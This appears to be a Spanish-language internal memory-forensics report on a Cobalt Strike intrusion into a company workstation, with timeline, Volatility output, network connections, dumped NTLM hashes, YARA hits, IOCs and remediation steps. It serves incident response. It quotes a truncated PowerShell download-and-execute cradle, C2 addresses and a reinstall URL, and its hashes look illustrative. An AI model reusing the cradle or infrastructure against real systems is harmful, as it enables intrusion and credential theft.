🔬
CULTIVA IA SECURITY Incident Response & Digital Forensics
CONFIDENCIAL — SOLO USO INTERNO

Informe Forense de Memoria RAM

TechSoluciones S.A.Cliente / Organización
WIN-WS-0047Workstation objetivo
INC-2026-0615-047ID de incidente
2026-06-15 02:51 UTCCaptura de memoria
Volatility 3 + YARAHerramientas
Carlos Vega <CULTIVA IA>Analista
CRÍTICO
Cobalt Strike Beacon activo detectado — Process Hollowing en svchost.exe (PID 3412) — Credenciales NTLM expuestas en memoria LSA — C2 activo sobre TLS a 185.220.101.47:443
Hallazgos Críticos
4
Requieren acción inmediata
Procesos Sospechosos
7
De 142 procesos totales
IOCs Extraídos
23
IPs · dominios · hashes
Memoria Analizada
16 GB
SHA256 verificado ✓
Línea de Tiempo del Incidente
  • 01:47 UTC
    Descarga del dropper inicial
    C:\Users\javier.ruiz\Downloads\invoice_Q2_2026.pdf.exe — firmado con certificado robado (Certum), 287 KB. Ejecutado por el usuario.
  • 01:48 UTC
    Process Hollowing en svchost.exe
    Dropper crea svchost.exe en estado SUSPENDED (PID 3412), vacía su imagen y escribe beacon Cobalt Strike. Padre: explorer.exe (PID 2180) — anómalo.
  • 01:49 UTC
    Beacon CS establece canal C2
    Primera conexión TLS a 185.220.101.47:443 (Tor exit node). Sleep: 60 s ± 30 % jitter. Perfil Malleable C2: mimicking Office 365 traffic.
  • 02:03 UTC
    Volcado de credenciales LSA
    Acceso a lsass.exe (PID 700) via MiniDumpWriteDump. Hashes NTLM extraídos: 4 usuarios incluyendo cuenta de dominio admin.
  • 02:19 UTC
    Lateral movement intentado
    Pass-the-Hash hacia 10.10.0.5 (servidor SVN interno) — bloqueado por firewall interno. Segunda conexión C2 a 91.92.251.103:8080.
  • 02:34 UTC
    Alerta SIEM — Aislamiento de red
    Correlación de reglas IDS: beaconing interval + TLS a Tor exit. Equipo aislado a las 02:51 UTC. Captura de RAM iniciada.
  • 02:51 UTC
    Captura de memoria completada
    memory_WIN-WS-0047_20260615T0251Z.raw — 16 GB — SHA256: a3f9c2d48e71b3...c237cacf
Análisis de Procesos — windows.pstree + windows.malfind
PIDPPIDProcesoRuta del ejecutableSesiónEstadoHallazgo
3412 2180 svchost.exe C:\Windows\System32\svchost.exe 1 HOLLOWED Cobalt Strike Beacon — Process Hollowing, PAGE_EXECUTE_RW, MZ header en VAD anónima
4892 3412 powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 1 SOSPECHOSO Spawneado por beacon CS. Cmdline: -EncodedCommand SQBFAFgA... (base64)
5201 4892 cmd.exe C:\Windows\System32\cmd.exe 1 SOSPECHOSO Ejecuta net user /domain y ipconfig /all
700 588 lsass.exe C:\Windows\System32\lsass.exe 0 DUMPED Accedido por handle desde PID 3412. Credenciales NTLM en memoria.
2180 1824 explorer.exe C:\Windows\explorer.exe 1 PADRE ANÓMALO Padre de svchost.exe — nunca debería serlo. Posible parent spoofing.
6630 3412 wscript.exe C:\Windows\System32\wscript.exe 1 SOSPECHOSO Ejecuta VBScript de persistencia en AppData
1420 668 services.exe C:\Windows\System32\services.exe 0 LEGÍTIMO
Salida windows.malfind — Regiones con PAGE_EXECUTE_READWRITE
# vol -f memory_WIN-WS-0047_20260615T0251Z.raw windows.malfind PID Process Start VPN End VPN Tag Protection CommitCharge PrivateMem File output 3412 svchost.exe 0x140000000 0x14017ffff VadS PAGE_EXECUTE_READWRITE 384 True svchost.exe.3412.dmp Hexdump 0x140000000: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ.............. b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ Disassembly: 0x140000000 4d dec ebp 0x140000001 5a pop edx 0x140000002 90 nop 0x140000003 0003 add [rbx], al # MZ Header confirmado — PE embebido en región anónima VAD — INDICADOR DE HOLLOWING 4892 powershell.exe 0x1c000000 0x1c01fffff VadS PAGE_EXECUTE_READWRITE 512 True powershell.exe.4892.dmp Disassembly: shellcode stub, probable reflective loader
Conexiones de Red — windows.netscan
PIDProcesoProtoIP LocalIP RemotaPuertoEstadoClasificación
3412 svchost.exe TCP 10.10.0.47:49821 185.220.101.47 443 ESTABLISHED C2 Principal — Tor exit node, TLS, Cobalt Strike JA3: a0e9f5d64349fb13191bc781f81f42e1
3412 svchost.exe TCP 10.10.0.47:49944 91.92.251.103 8080 TIME_WAIT C2 Backup — AS Frantech Solutions, posible servidor VPS comprometido
5201 cmd.exe TCP 10.10.0.47:49888 10.10.0.5 445 CLOSED SMB interno — intento Pass-the-Hash fallido
2180 explorer.exe TCP 10.10.0.47:50012 52.96.88.4 443 ESTABLISHED Microsoft Office 365 — legítimo
Credenciales en Memoria — windows.hashdump + lsadump
UsuarioHash NTLMRiesgo
javier.ruiz aad3b435b51404eeaad3b435b51404ee:8f14e45fceea167a5a36dedd4bea2543 CRÍTICO
TECHSOL\admin aad3b435b51404eeaad3b435b51404ee:c4ca4238a0b923820dcc509a6f75849b CRÍTICO
srv-deploy aad3b435b51404eeaad3b435b51404ee:eccbc87e4b5ce2fe28308fd9f2a7baf3 ALTO
backup-agent aad3b435b51404eeaad3b435b51404ee:1679091c5a880faf6fb5e6087eb1b2dc ALTO

⚠️ Resetear contraseñas INMEDIATAMENTE. Hash NTLM de admin de dominio comprometido.

Detección YARA — Reglas Cobalt Strike + Shellcode
Regla YARAPID / OffsetMatch
Cobalt_Strike_Beacon 3412 @ 0x14000A430 HIT — $sleep + $beacon
Cobalt_Strike_Malleable_C2 3412 @ 0x14001F880 HIT — HTTP Host header spoofing
Suspicious_Injection 4892 @ 0x1C000100 HIT — MZ + $shellcode1
Reflective_DLL_Loader 4892 @ 0x1C002040 HIT
Mimikatz_InMemory 3412 @ 0x14003A120 HIT — sekurlsa strings
Hallazgos Críticos
FIND-001 CRÍTICO Cobalt Strike Beacon via Process Hollowing en svchost.exe
El proceso svchost.exe (PID 3412), hijo anómalo de explorer.exe, contiene un PE embebido en región VAD con protección PAGE_EXECUTE_READWRITE. YARA confirma firmas de Cobalt Strike 4.x con perfil Malleable C2 mimicking Office 365. Canal C2 activo en 185.220.101.47:443 (Tor exit node) con JA3 fingerprint conocido.
Técnica ATT&CK
T1055.012 — Process Hollowing
Indicador
MZ header @ 0x140000000 en VAD anónima
C2 IP
185.220.101.47:443
CS Version
Cobalt Strike 4.9 (estimado por JA3)
FIND-002 CRÍTICO Volcado de lsass.exe — Credenciales NTLM comprometidas
El beacon (PID 3412) abrió un handle a lsass.exe con derechos PROCESS_VM_READ y ejecutó volcado de credenciales equivalente a Mimikatz sekurlsa::logonpasswords. Se recuperaron 4 hashes NTLM, incluyendo la cuenta TECHSOL\admin. Peligro de movimiento lateral inmediato.
Técnica ATT&CK
T1003.001 — LSASS Memory
Cuentas afectadas
javier.ruiz, TECHSOL\admin, srv-deploy, backup-agent
API usada
MiniDumpWriteDump (detectado por strings)
Acción inmediata
RESET todas las contraseñas afectadas YA
FIND-003 ALTO PowerShell Encoded + Reflective DLL Loader
El beacon spawneó powershell.exe (PID 4892) con comando Base64 que decodifica a un reflective loader. Posible descarga de segunda etapa (stager). YARA detecta patrón de reflective DLL injection en memoria del proceso.
Técnica ATT&CK
T1059.001 + T1620 Reflective Code Loading
Payload Base64 (inicio)
IEX (New-Object Net.WebClient).Down...
FIND-004 ALTO Mecanismo de Persistencia VBScript en AppData
wscript.exe (PID 6630) ejecuta C:\Users\javier.ruiz\AppData\Roaming\Microsoft\update_check.vbs. Strings extraídas muestran que el script reinstala el dropper desde URL pastebin si el proceso beacon no está activo. Clave de registro Run confirmada.
Técnica ATT&CK
T1547.001 — Registry Run Keys
Clave registro
HKCU\...\Run: "WindowsUpdate" → wscript.exe update_check.vbs
URL de reinstalación
hxxps://pastebin[.]com/raw/Xk9mP2nL
Acción
Eliminar archivo VBS + clave de registro
IOCs Extraídos (23) — Para bloqueo inmediato en firewall / SIEM
IPs C2
185.220.101.47
91.92.251.103
Tor exit + VPS comprometido
Dominios / URLs
pastebin[.]com/raw/Xk9mP2nL
cdn-update[.]net
office365-login[.]com
Typosquatting + staging
Hashes de Malware
SHA256: a3f9c2d4...8e12f490
MD5: 5f4dcc3b5aa765d61d8327deb882cf99
Dropper + beacon dumpeado
Cobertura del Análisis — Plugins Volatility 3 Ejecutados
windows.pstree / pslist / psscan100%
windows.malfind (Process Injection)100%
windows.netscan (Conexiones de red)100%
windows.hashdump + lsadump100%
windows.yarascan (Cobalt Strike + Shellcode)100%
windows.cmdline + consoles100%
windows.registry.printkey (Run keys)100%
windows.driverscan + ssdt (Rootkit)100%
strings + FLOSS (Obfuscated strings)100%
Análisis de disco correlacionado30%
Recomendaciones de Contención y Remediación
#AcciónPrioridadResponsablePlazo
1Resetear contraseñas de TECHSOL\admin, javier.ruiz, srv-deploy, backup-agent. Revocar sesiones activas.INMEDIATOSysAdmin< 1 h
2Bloquear en firewall perimetral IPs 185.220.101.47 y 91.92.251.103. Aplicar IOC feed completo.INMEDIATONetOps< 1 h
3Eliminar update_check.vbs y clave de registro Run en WIN-WS-0047. Verificar todos los endpoints.HOYIR Team< 4 h
4Re-image completa de WIN-WS-0047. No reutilizar hasta nuevo análisis limpio.ALTOIT / SOC< 24 h
5Auditar logs de acceso a servidor SVN (10.10.0.5) desde 2026-06-15 01:00 UTC. Verificar integridad del repositorio.ALTODevOps< 8 h
6Activar MFA en todas las cuentas de dominio admin. Implementar Credential Guard en endpoints.MEDIOSysAdmin< 72 h
7Desplegar reglas YARA (Cobalt Strike) en todos los EDRs. Actualizar detecciones SIEM con JA3 hash identificado.MEJORASOC< 1 semana